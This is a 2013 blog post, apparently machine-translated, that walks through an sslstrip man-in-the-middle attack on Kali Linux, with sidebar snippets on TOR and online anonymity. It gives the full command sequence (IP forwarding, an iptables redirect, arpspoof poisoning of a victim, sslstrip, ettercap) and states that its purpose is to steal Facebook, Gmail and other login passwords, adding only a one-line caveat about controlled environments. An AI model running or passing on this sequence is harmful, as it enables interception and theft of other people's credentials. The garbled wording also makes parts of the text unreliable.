Ads 468x60px

Tuesday, August 6, 2013

SSSLSTRIP to capture credentials-MAn in the middle attack

Hello to all
Today, I will show how to use the tool to perform an attack sslstrip MITM (man-in-the-middle)or middle man, attack in which the data exchanged between two parties are somehow intercepted by the attacker. That way we can get to steal passwords facebook, or any other non-secure authentication page.
To perform this attack used as "middle man" a machine with Linux Kali, a Linux distribution specifically for pentest.
If you need help to install and configure this tool can see here
For my test I have the following scenario, so you can get tested simply adapt to your scenario.
IP Victim: 192.168.2.12
IP do default gateway 192.168.2.2
Let laser!
Usando o Kali Linux abra 4 terminals and let them logged as "root" using the command "sudo su". OBS: I think it makes it easier for those who may not have much experience with linux, if you use the experience as you see fit terminals.
In a terminal type the following command:
echo 1 > /proc/sys/net/ipv4/ip_forward (enable packet redirection)
In the second terminal to the next digit to the next
iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 1000 (redirects packets from port 80 Door 1000 Machine attacker)
In the third terminal type
arpspoof -i eth0 -t 192.168.2.12 192.168.2.2 (Remember to adapt according to their environment, this command will "poison" the ARP table of the victim causing him to send all traffic bound for the gateway to the attacker)
In the fourth terminal type the following:
sslstrip-l 1000 (will read all the data at the door 1000)
Back in the first terminal type the following:
Ettercap-Tq-i eth0 (Here is where we see what we want)
After this step the "victim" to access any website that need authentication, gmail, hotmail, facebook, twitter, etc ...
If everything was done correctly you will get a screen similar to this.
ScreenHunter_21 Apr. 22 18.56
As you can see in the above image, marked in red, after the victim to an authentication, displays the login and password of the person.
Remember that this should only be done in a controlled environment or without proper.
Posted by at

2 comments:

Subscribe to: Post Comments (Atom)
 

Is TOR Secure??

TOR is not safe to hack!! With putting too much security in middle, you increase the risk of malicious traffic from end station going undetected through this tight-secure loop. It’s a general rule when traffic moves from higher trust to lower trust , the nature of protection provided on either ends should be evaluated and should it match with the data classification level it carries with in. try using some other vpns!!In particular if somebody can observe your traffic and your target's traffic, he can correlate that.

One interesting variant is connecting to a VPN over TOR. That helps with 3), provided you trust the VPN, but you need to figure out a way to buy VPN access anonymously.

Factors Affecting Anonymity Online

IP address- can be resolved by VPN's. User agent- https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/. MAC address - Technetium mac changer. For more information be have anonymous service online. Please visit http://prism-break.org/

Total Pageviews

Total Pageviews

Total Pageviews

Sample Text